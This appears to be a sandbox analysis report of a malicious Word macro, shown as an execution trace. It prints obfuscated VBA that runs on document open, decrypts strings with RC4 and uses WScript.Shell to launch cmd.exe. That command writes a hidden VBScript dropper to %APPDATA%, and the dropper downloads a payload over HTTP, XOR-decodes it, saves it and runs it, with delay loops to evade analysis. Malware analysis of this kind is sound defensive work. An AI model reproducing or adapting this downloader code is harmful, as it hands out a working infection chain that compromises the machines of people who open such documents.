66 | PirzfK(22) = PirzfK(18) | |
67 | PirzfK(23) = PirzfK(19) | |
69 | PirzfK(24) = PirzfK(16) | |
70 | PirzfK(25) = PirzfK(17) | |
71 | PirzfK(26) = PirzfK(18) | |
72 | PirzfK(27) = PirzfK(19) | |
74 | PirzfK(28) = PirzfK(16) | |
75 | PirzfK(29) = PirzfK(17) | |
76 | PirzfK(30) = PirzfK(18) | |
78 | PirzfK(31) = PirzfK(19) | |
79 | PirzfK(32) = PirzfK(16) | |
80 | PirzfK(33) = PirzfK(17) | |
82 | PirzfK(34) = PirzfK(18) | |
83 | PirzfK(35) = PirzfK(19) | |
84 | If Ks86hO(Y38LuKe, PirzfK) = "Ty1JxNupjQkgl" Then | |
84 | Exit For | |
84 | Endif | |
86 | Next QqsXx | |
87 | Dim UWMo1(6) as Byte, NvR9c9m(31) as Byte | |
88 | UWMo1(0) = 213 | |
90 | UWMo1(1) = 223 | |
91 | UWMo1(2) = 225 | |
92 | UWMo1(3) = 191 | |
93 | UWMo1(4) = 201 | |
95 | UWMo1(5) = 52 | |
96 | UWMo1(6) = 124 | |
97 | NvR9c9m(0) = 69 | |
98 | NvR9c9m(1) = 110 | |
99 | NvR9c9m(2) = 51 | |
101 | NvR9c9m(3) = 49 | |
102 | NvR9c9m(4) = 78 | |
103 | NvR9c9m(5) = 85 | |
104 | NvR9c9m(6) = 69 | |
105 | NvR9c9m(7) = 53 | |
106 | NvR9c9m(8) = 114 | |
108 | NvR9c9m(9) = 55 | |
109 | NvR9c9m(10) = 85 | |
110 | NvR9c9m(11) = 56 | |
111 | For QqsXx = GzYTO(Um56UX) To GzYTO(UMU) | |
112 | NvR9c9m(12) = JaY8xys(QqsXx, 1) | |
113 | NvR9c9m(13) = JaY8xys(QqsXx, 2) | |
115 | NvR9c9m(14) = JaY8xys(QqsXx, 3) | |
116 | NvR9c9m(15) = JaY8xys(QqsXx, 4) | |
117 | NvR9c9m(16) = NvR9c9m(12) | |
118 | NvR9c9m(17) = NvR9c9m(13) | |
119 | NvR9c9m(18) = NvR9c9m(14) | |
120 | NvR9c9m(19) = NvR9c9m(15) | |
122 | NvR9c9m(20) = NvR9c9m(12) | |
123 | NvR9c9m(21) = NvR9c9m(13) | |
124 | NvR9c9m(22) = NvR9c9m(14) | |
125 | NvR9c9m(23) = NvR9c9m(15) | |
126 | NvR9c9m(24) = NvR9c9m(12) | |
128 | NvR9c9m(25) = NvR9c9m(13) | |
129 | NvR9c9m(26) = NvR9c9m(14) | |
130 | NvR9c9m(27) = NvR9c9m(15) | |
131 | NvR9c9m(28) = NvR9c9m(12) | |
132 | NvR9c9m(29) = NvR9c9m(13) | |
133 | NvR9c9m(30) = NvR9c9m(14) | |
135 | NvR9c9m(31) = NvR9c9m(15) | |
136 | If Ks86hO(UWMo1, NvR9c9m) = "Kd4ScVe" Then | |
136 | Exit For | |
136 | Endif | |
137 | Next QqsXx | |
138 | Dim En4vH(18) as Byte, L5YvhA(31) as Byte | |
140 | En4vH(0) = 119 | |
141 | En4vH(1) = 209 | |
142 | En4vH(2) = 222 | |
143 | En4vH(3) = 236 | |
145 | En4vH(4) = 24 | |
146 | En4vH(5) = 85 | |
147 | En4vH(6) = 70 | |
148 | En4vH(7) = 221 | |
150 | En4vH(8) = 244 | |
151 | En4vH(9) = 132 | |
152 | En4vH(10) = 243 | |
153 | En4vH(11) = 62 | |
154 | En4vH(12) = 188 | |
155 | En4vH(13) = 143 | |
157 | En4vH(14) = 69 | |
158 | En4vH(15) = 4 | |
159 | En4vH(16) = 202 | |
160 | En4vH(17) = 225 | |
161 | En4vH(18) = 231 | |
163 | L5YvhA(0) = 83 | |
164 | L5YvhA(1) = 109 | |
165 | L5YvhA(2) = 74 | |
167 | L5YvhA(3) = 74 | |
168 | L5YvhA(4) = 110 | |
169 | L5YvhA(5) = 86 | |
170 | L5YvhA(6) = 72 | |
171 | L5YvhA(7) = 79 | |
172 | L5YvhA(8) = 105 | |
174 | L5YvhA(9) = 79 | |
175 | L5YvhA(10) = 75 | |
176 | L5YvhA(11) = 73 | |
178 | For QqsXx = GzYTO(Um56UX) To GzYTO(UMU) | |
179 | L5YvhA(12) = JaY8xys(QqsXx, 1) | |
180 | L5YvhA(13) = JaY8xys(QqsXx, 2) | |
181 | L5YvhA(14) = JaY8xys(QqsXx, 3) | |
182 | L5YvhA(15) = JaY8xys(QqsXx, 4) | |
183 | L5YvhA(16) = L5YvhA(12) | |
185 | L5YvhA(17) = L5YvhA(13) | |
186 | L5YvhA(18) = L5YvhA(14) | |
187 | L5YvhA(19) = L5YvhA(15) | |
188 | L5YvhA(20) = L5YvhA(12) | |
189 | L5YvhA(21) = L5YvhA(13) | |
191 | L5YvhA(22) = L5YvhA(14) | |
192 | L5YvhA(23) = L5YvhA(15) | |
193 | L5YvhA(24) = L5YvhA(12) | |
194 | L5YvhA(25) = L5YvhA(13) | |
195 | L5YvhA(26) = L5YvhA(14) | |
196 | L5YvhA(27) = L5YvhA(15) | |
198 | L5YvhA(28) = L5YvhA(12) | |
199 | L5YvhA(29) = L5YvhA(13) | |
200 | L5YvhA(30) = L5YvhA(14) | |
201 | L5YvhA(31) = L5YvhA(15) | |
203 | If Ks86hO(En4vH, L5YvhA) = "Oy7cl8WCZ2GANM8ENq9" Then | |
203 | Exit For | |
203 | Endif | |
204 | Next QqsXx | |
205 | Dim Sk(12) as Byte, PczKQW(31) as Byte | |
207 | Sk(0) = 88 | |
208 | Sk(1) = 173 | |
209 | Sk(2) = 159 | |
210 | Sk(3) = 123 | |
212 | Sk(4) = 228 | |
213 | Sk(5) = 187 | |
214 | Sk(6) = 149 | |
215 | Sk(7) = 78 | |
216 | Sk(8) = 213 | |
218 | Sk(9) = 129 | |
219 | Sk(10) = 47 | |
220 | Sk(11) = 224 | |
221 | Sk(12) = 196 | |
223 | PczKQW(0) = 71 | |
224 | PczKQW(1) = 114 | |
225 | PczKQW(2) = 107 | |
227 | PczKQW(3) = 79 | |
228 | PczKQW(4) = 86 | |
229 | PczKQW(5) = 111 | |
230 | PczKQW(6) = 118 | |
231 | PczKQW(7) = 81 | |
232 | PczKQW(8) = 101 | |
234 | PczKQW(9) = 57 | |
235 | PczKQW(10) = 69 | |
236 | PczKQW(11) = 84 | |
237 | For QqsXx = GzYTO(Um56UX) To GzYTO(UMU) | |
239 | PczKQW(12) = JaY8xys(QqsXx, 1) | |
240 | PczKQW(13) = JaY8xys(QqsXx, 2) | |
241 | PczKQW(14) = JaY8xys(QqsXx, 3) | |
243 | PczKQW(15) = JaY8xys(QqsXx, 4) | |
244 | PczKQW(16) = PczKQW(12) | |
245 | PczKQW(17) = PczKQW(13) | |
246 | PczKQW(18) = PczKQW(14) | |
247 | PczKQW(19) = PczKQW(15) | |
249 | PczKQW(20) = PczKQW(12) | |
250 | PczKQW(21) = PczKQW(13) | |
251 | PczKQW(22) = PczKQW(14) | |
252 | PczKQW(23) = PczKQW(15) | |
253 | PczKQW(24) = PczKQW(12) | |
254 | PczKQW(25) = PczKQW(13) | |
256 | PczKQW(26) = PczKQW(14) | |
257 | PczKQW(27) = PczKQW(15) | |
258 | PczKQW(28) = PczKQW(12) | |
259 | PczKQW(29) = PczKQW(13) | |
260 | PczKQW(30) = PczKQW(14) | |
262 | PczKQW(31) = PczKQW(15) | |
263 | If Ks86hO(Sk, PczKQW) = "SglmsTsU5MQqX" Then | |
263 | Exit For | |
263 | Endif | |
264 | Next QqsXx | |
265 | Dim Kd5J(131) as Byte, Q0l5YJC as Long, PW8gBif as Long | |
266 | Q0l5YJC = 0 | |
267 | PW8gBif = 0 | |
269 | For QqsXx = 0 To GzYTO(PirzfK) | |
270 | Kd5J(QqsXx) = PirzfK(QqsXx) | |
271 | Q0l5YJC = Q0l5YJC + 1 | |
273 | Next QqsXx | |
274 | For QqsXx = GzYTO(PirzfK) + 1 To GzYTO(NvR9c9m) + Q0l5YJC | |
275 | Kd5J(QqsXx) = NvR9c9m(PW8gBif) | |
277 | PW8gBif = PW8gBif + 1 | |
278 | Q0l5YJC = Q0l5YJC + 1 | |
279 | Next QqsXx | |
280 | PW8gBif = 0 | |
281 | For QqsXx = Q0l5YJC To GzYTO(L5YvhA) + Q0l5YJC | |
282 | Kd5J(QqsXx) = L5YvhA(PW8gBif) | |
284 | PW8gBif = PW8gBif + 1 | |
285 | Q0l5YJC = Q0l5YJC + 1 | |
286 | Next QqsXx | |
287 | PW8gBif = 0 | |
288 | For QqsXx = Q0l5YJC To GzYTO(PczKQW) + Q0l5YJC | |
289 | Kd5J(QqsXx) = PczKQW(PW8gBif) | |
291 | PW8gBif = PW8gBif + 1 | |
292 | Q0l5YJC = Q0l5YJC + 1 | |
293 | Next QqsXx | |
294 | B6BznN = Ks86hO(RAOvP, Kd5J) | |
295 | Dim C9og3f(12) as Byte, UGc(1) as Byte | |
296 | C9og3f(0) = 216 | |
298 | C9og3f(1) = 62 | |
299 | C9og3f(2) = 79 | |
300 | C9og3f(3) = 164 | |
301 | C9og3f(4) = 35 | |
302 | C9og3f(5) = 163 | |
304 | C9og3f(6) = 39 | |
305 | C9og3f(7) = 130 | |
306 | C9og3f(8) = 21 | |
307 | C9og3f(9) = 2 | |
308 | C9og3f(10) = 7 | |
310 | C9og3f(11) = 174 | |
311 | C9og3f(12) = 211 | |
312 | UGc(0) = 65 | |
313 | UGc(1) = 114 | |
314 | Dim DFfKIT as Object | |
315 | Set DFfKIT = CreateObject(Ks86hO(C9og3f, UGc)) | CreateObject("Wscript.Shell") executed |
317 | DFfKIT.Run B6BznN, ((587 - 42) - (3682020 / 6756)), ((1675644 / 5942) - (6865 - 6583)) | IWshShell3.Run("cmd.exe /V /C set "GBG=%APPDATA%\%RANDOM%.vbs" && (for %i in ("DIm DxF3znV" "FunCTIoN RM7H(TqP,SUpcFxy)" "BCGW2=65" "dIM Qiw,O2ErlP,PEd4" "Qo1rh7B=85" "fOr Qiw=1 tO (Len(TqP)/2)" "O2ErlP=(XtPB7z2((-3701+3739)) & XtPB7z2((524880/7290))&(mId(TqP,(Qiw+Qiw)-1,2)))" "PEd4=(MZrD(Mid(SUpcFxy,((Qiw moD LEn(SUpcFxy))+1),1)))" "RM7H=RM7H+XtPB7z2(KLGYdz(O2ErlP,PEd4))" "NEXt" "RCTUfL=22" "EnD fUncTIOn" "Cllae0=23" "KyzlwC" "sUB KyzlwC()" "OF=45" "DIm Tw,Jl,WC8fC" "Ui=84" "Tw=96824294" "KNatGfc=89" "FOr Jl=1 tO Tw" "WC8fC=WC8fC+1" "NexT" "Xt=77" "iF WC8fC=Tw Then" "Ep8UXJ=64" "Mule6z((1336770/4951))" "DFyX5SF=24" "PbE0o(RM7H("2B39233377786C28342C3B362F29222F223E3163342C2078253A79293D30","WCM"))" "N08kbpy=70" "eLsE" "TeDg=46" "SG5Ave=28" "EnD iF" "TSoUPG=33" "EnD suB" "FUnCTIoN XtPB7z2(C9NbQom)" "PkAKI0E=14" "XtPB7z2=Chr(C9NbQom)" "LK=15" "eND FuNCTiON" "SuB Wusodn4()" "XuOFto5=43" "Dim UQFOGB, KJk" "For UQFOGB = 38 To 9000267" "KJk = RyQrP + 83 + 80 + 90" "Next" "DVYff=1" "End sUB" "SUb M0cJLn()" "NM=43" "diM VW,ELc,PCds,BjuC5aE" "NH=28" "PCds=""""" "Mt=19" "ELc=DxF3znV & TKsHu & RM7H("7D045507","NSp8wZ0")" "RQwDOV=4" "MNs9uB DxF3znV,ELc" "O5t=91" "iF BjuC5aE="" THen Mule6z(4)" "L1ksUsW=17" "VW="SIrWOMB"" "LwjuV=31" "SEt BwZn=cREaTeOBject(RM7H("1E21343D24322767213F2A212E",VW))" "BVv1A=80" "BwZn.RUn RM7H("2D1C2F6F1D4E266E5E08612B62021C256B635A1661","CNqKAx6") & ELc & PCds,8134-8134,2260-2260" "TIbnnCE=13" "End Sub" "SuB SsQ()" "P1t=5" "dIM NgoLmHV,TGr" "Cv80c3=62" "Do WhIle NgoLmHV<>5317-5316" "TGr=TGr+1" "WSCript.sLEEP(28)" "Loop" "D1zerr=83" "EnD sUB" "sUb Mule6z(RevOKyJ)" "WQ50Sb6=91" "DiM LpZsh" "QW=34" "LpZsh=timER+RevOKyJ" "dO whIle TiMeR<LpZsh" "wSCRiPt.Sleep(2)" "Loop" "Er8g9=8" "EnD sUB" "fUNCtion TKsHu()" "GtkE=70" "TKsHu=SecONd(TImE)" "OZgqxC=48" "enD fUnCTioN" "FUncTioN PbE0o(SE1cf)" "ReuR=18" "dIM RAOx,XkSvP,CNlxWn,EPNWwO,PQMM" "YVYNy=1" "On erroR reSUmE 
NeXt" "ARJH8=74" "CNlxWn="QAMNVmL"" "R0VOo=25" "sET RAOx=crEATEobjECT(RM7H("161E2D24043C256F1E26330120",CNlxWn))" "LRRQfm=62" "Wusodn4" "X77kzx=91" "Set OAmVp=RAOx.ENVirOnMeNT(RM7H("33250E20321230","Acw"))" "XIzNEID=1" "DxF3znV=OAmVp(RM7H("13110413131515","WRAT"))&XtPB7z2((830-738))& TKsHu & TKsHu" "TC3=16" "EPNWwO="IHCr"" "I5DpS=10" "SeT XkSvP=crEatEobJEcT(RM7H("052A113B27301D2F3C6D2A04040B261D18",EPNWwO))" "KU=48" "XkSvP.OPen RM7H("0E713D","XI4i0"),SE1cf,9990-9990" "Ie=16" "XkSvP.SEtRequeSTheaDer RM7H("1F5409572A","QM5g0OA"),RM7H("3320022422644371686A5B","AQYv")" "YYYHtq1=70" "XkSvP.SEnD()" "X0E0=33" "if XkSvP.STAtuSTExt=RM7H("13122A371A392F531B2C1D2C261D2C","XCs") then" "SqN2=57" "Wusodn4" "GX=46" "Mule6z(4)" "Yad=55" "FH XkSvP.rEspoNseBoDY" "MMA=83" "Else" "Wuc8=82" "PQMM="E3rz"" "X6KS=14" "SeT XkSvP= creatEoBJECt(RM7H("7E1B19375C011523475C22087F3A2E1163",PQMM))" "BjdWH=29" "XkSvP.OpeN RM7H("292B35","Mnna0kE"),RM7H("5E30324074196B2F5423572D355F20182A2344615033685A3E51","N6DF0" ),9751-9751" "VcHw=29" "XkSvP.sEtrEqUeSTHEaDEr RM7H("332E0F2804","Oa"),RM7H("542A4628456E077D0F601F","M6S2")" "VMX=37" "XkSvP.SEnD()" "QSABO=86" "If XkSvP.StatUSTeXT=RM7H("2350304D252E1F110156223B165F36","Os1B9L") tHEn FH XkSvP.responSeBODy" "I3D=66" "Jhd=59" "end if" "OFqx1=45" "End FUncTIOn" "sUb FH(YAuf)" "Yn=86" "dIm M5,Y9zz983" "O9zJmIO=30" "Y9zz983="XF"" "PMY=63" "SEt M5=createObJECt(RM7H("071C091C0476152C343D2735",Y9zz983))" "VZ1=19" "M5.OpeN" "YVIgE=35" "M5.TYpE=9542-9541" "FH5xrC=28" "M5.WritE YAuf" "WN8ajm=73" "M5.sAVetoFiLe DxF3znV,5206-5204" "QKYC=21" "M5.cLoSE" "FzUz8m=8" "M0cJLn" "Iw6Z=36" "eND SUb" "funcTioN MZrD(QAd)" "JrGZqM=95" "MZrD=ASc(QAd)" "GvVffY=48" "enD FuNcTiON" "funCTion MNs9uB(LXzuy,NUa)" "SOv6=61" "dIm GH7,KJkz,AdyAC,OPkR,Fp(7)" "KA=45" "Fp(1)=106" "IXQyb=39" "Fp(6)=115" "CFw=41" "Fp(2)=118" "RwOAf4r=86" "Fp(3)=103" "U0r=78" "Fp(7)=111" "MJ56ht=71" "Fp(4)=116" "KTBrm=13" "Fp(0)=115" "CtMg=90" "Fp(5)=104" "GJQ=89" "PSKfp1=28" "sET 
GH7=cREaTEobjEct(RM7H("002431302538253D206D1F3C2029003E302D302103312D263A21", "LSGCYUL"))" "PeN5TC8=50" "Set KJkz=GH7.gETfilE(LXzuy)" "XcYZQp=30" "sET OPkR=KJkz.oPenastExtstrEaM(733-732,8036-8036)" "DXG=52" "sEt AdyAC=GH7.CREaTETextFile(NUa,239-238,3016-3016)" "RU0xHi=89" "dO UntIl OPkR.AtENdOfstrEam" "AdyAC.WrITe XtPB7z2(KLGYdz(MZrD(OPkR.reAd(4298-4297)),Fp(0)))" "LOOp" "Uu48fY=88" "AdyAC.CLOse" "Oc=29" "OPkR.CLOse" "FTHurcs=65" "End fuNCtIOn" "fUNCtIon KLGYdz(Qtoxg,Fjo)" "RsgNc=91" "KLGYdz=(Qtoxg ANd Not Fjo)Or(noT Qtoxg aND Fjo)" "Pq4oC=28" "eNd fUnction") do @echo %~i)>"!GBG!" && start "" "!GBG!"",0,0) -> 0 executed |
318 | End Sub |
APIs | Meta Information |
---|---|
Part of subcall function K9@ThisDocument: Split | |
Part of subcall function K9@ThisDocument: Label1 | |
Part of subcall function K9@ThisDocument: CreateObject | |
Part of subcall function K9@ThisDocument: Run |
Line | Instruction | Meta Information |
---|---|---|
319 | Private Sub DocumeNt_OPen() | |
320 | On Error Resume Next | executed |
321 | Dim CTxkvAj as Long, B0JKYZD as Long, GFHkrO as Long | |
323 | CTxkvAj = 98757 | |
324 | For B0JKYZD = 1 To CTxkvAj | |
325 | GFHkrO = GFHkrO + 1 | |
326 | Next B0JKYZD | |
327 | If GFHkrO = CTxkvAj Then | |
328 | Dim T2 as Integer, XPxRJX as String | |
330 | For T2 = 4 To 568 | |
331 | XPxRJX = XPxRJX + T2 | |
332 | Next | |
334 | K9 | |
335 | Else | |
336 | NlKk1p | |
337 | Endif | |
338 | End Sub |
Line | Instruction | Meta Information |
---|---|---|
370 | Private Function Ks86hO(GJDwbXe() as Byte, J97AXWJ() as Byte) as String | |
371 | On Error Resume Next | executed |
372 | Dim WCN(0 To 255) as Integer, JzuQ as Long, SU4Pcwy as Long, NgY as Long, JFeic as Byte, DDt1g() as Byte, IVwF59() as Byte | |
374 | Redim DDt1g(GzYTO(GJDwbXe)) | |
375 | DDt1g = GJDwbXe | |
376 | Redim IVwF59(GzYTO(J97AXWJ)) | |
377 | IVwF59 = J97AXWJ | |
378 | For JzuQ = 0 To (- 7610 + 7865) | |
379 | WCN(JzuQ) = JzuQ | |
381 | Next JzuQ | |
382 | JzuQ = 0 | |
383 | SU4Pcwy = 0 | |
384 | NgY = 0 | |
385 | For JzuQ = 0 To (1668465 / 6543) | |
386 | SU4Pcwy = SkTX4v((SU4Pcwy + WCN(JzuQ) + IVwF59(SkTX4v(JzuQ, (GzYTO(J97AXWJ) + 1)))), ((4276 - 4020))) | |
388 | JFeic = WCN(JzuQ) | |
389 | WCN(JzuQ) = WCN(SU4Pcwy) | |
390 | WCN(SU4Pcwy) = JFeic | |
391 | Next JzuQ | |
393 | JzuQ = 0 | |
394 | SU4Pcwy = 0 | |
395 | NgY = 0 | |
396 | For JzuQ = 0 To GzYTO(GJDwbXe) | |
397 | SU4Pcwy = SkTX4v((SU4Pcwy + 1), (6880 - 6624)) | |
398 | NgY = SkTX4v((NgY + WCN(SU4Pcwy)), (- 426 + 682)) | |
400 | JFeic = WCN(SU4Pcwy) | |
401 | WCN(SU4Pcwy) = WCN(NgY) | |
402 | WCN(NgY) = JFeic | |
403 | DDt1g(JzuQ) = FHHth5(DDt1g(JzuQ), (WCN(SkTX4v((WCN(SU4Pcwy) + WCN(NgY)), ((646144 / 2524)))))) | |
404 | Next JzuQ | |
405 | Ks86hO = R0(DDt1g) | |
407 | End Function |
Line | Instruction | Meta Information |
---|---|---|
354 | Private Function EhDH2(ByVal IxJUP as String, ByVal X420 as Long, ByVal AIOs as Variant) as String | |
355 | Dim LTEL() as Byte, A6fY() as Byte, EhS as Long, YW as Long | executed |
357 | LTEL = IxJUP | |
358 | EhS = GzYTO(LTEL) | |
359 | X420 = (X420 - 1) * 2 | |
360 | AIOs = (AIOs * 2) - 1 | |
361 | If X420 + AIOs > EhS Then | |
361 | AIOs = EhS - X420 | |
361 | Endif | |
363 | Redim A6fY(AIOs) | |
364 | For YW = X420 To X420 + AIOs | |
365 | A6fY(YW - X420) = LTEL(YW) | |
367 | Next YW | |
368 | EhDH2 = A6fY | |
369 | End Function |
Line | Instruction | Meta Information |
---|---|---|
432 | Private Function IJ(ByVal EV as Integer) as String | |
433 | Dim Mjjq8Xy(1) as Byte, Bek2Mv3 as Byte, RYkEaJ as Byte | executed |
434 | If EV < 0 Then | |
434 | Exit Function | |
434 | Endif | |
435 | If EV > (- 5901 + 6156) Then | |
437 | RYkEaJ = 0 | |
438 | Else | |
439 | Bek2Mv3 = EV | |
440 | RYkEaJ = 0 | |
442 | Endif | |
443 | Mjjq8Xy(0) = Bek2Mv3 | |
444 | Mjjq8Xy(1) = RYkEaJ | |
445 | IJ = Mjjq8Xy | |
447 | End Function |
Line | Instruction | Meta Information |
---|---|---|
419 | Private Function GzYTO(ByVal LzRU5Mi as Variant) as Long | |
420 | On Error Goto Xs5uG8 | executed |
421 | Dim DPcIJ as Long, NxI as Variant | |
422 | Do | |
424 | NxI = LzRU5Mi(DPcIJ) | |
425 | DPcIJ = DPcIJ + 1 | |
426 | Loop | |
426 | Xs5uG8: | |
428 | If DPcIJ = 0 Then | |
428 | Exit Function | |
428 | Endif | |
430 | GzYTO = DPcIJ - 1 | |
431 | End Function |
Line | Instruction | Meta Information |
---|---|---|
408 | Private Function JaY8xys(Fj3 as Long, SUjGb as Long) as Byte | |
409 | Dim ClRNr as Long, TsBt as Long | executed |
410 | For ClRNr = (3213 - 3165) To (8990 - 8933) | |
411 | If EhDH2(Fj3, SUjGb, 1) = TsBt Then | |
411 | JaY8xys = ClRNr | |
411 | Exit For | |
411 | Endif | |
413 | TsBt = TsBt + 1 | |
414 | Next ClRNr | |
415 | End Function |
Line | Instruction | Meta Information |
---|---|---|
343 | Private Function R0(DlWkVBh() as Byte) as String | |
344 | Dim TgXwjZn as Long | executed |
346 | For TgXwjZn = 0 To GzYTO(DlWkVBh) | |
347 | R0 = R0 & IJ(DlWkVBh(TgXwjZn)) | |
348 | Next TgXwjZn | |
349 | End Function |
Line | Instruction | Meta Information |
---|---|---|
340 | Private Function FHHth5(XsKg, TWba) | |
341 | FHHth5 = (XsKg And Not TWba) Or (Not XsKg And TWba) | executed |
342 | End Function |
Line | Instruction | Meta Information |
---|---|---|
350 | Private Function SkTX4v(KLVL, FznF) | |
352 | SkTX4v = KLVL - (FznF * (KLVL \ FznF)) | executed |
353 | End Function |
Non-Executed Functions |
---|
Line | Instruction | Meta Information |
---|---|---|
416 | Private Sub NlKk1p() | |
417 | End Sub |
Module: UserForm1 |
---|
Declaration |
---|
Line | Content |
---|---|
1 | Attribute VB_Name = "UserForm1" |
2 | Attribute VB_Base = "0{774FA1C1-296F-42E0-AC5C-4F18002D0542}{44E9776F-97A3-4FF4-8105-36CD6C3C2042}" |
3 | Attribute VB_GlobalNameSpace = False |
4 | Attribute VB_Creatable = False |
5 | Attribute VB_PredeclaredId = True |
6 | Attribute VB_Exposed = False |
7 | Attribute VB_TemplateDerived = False |
8 | Attribute VB_Customizable = False |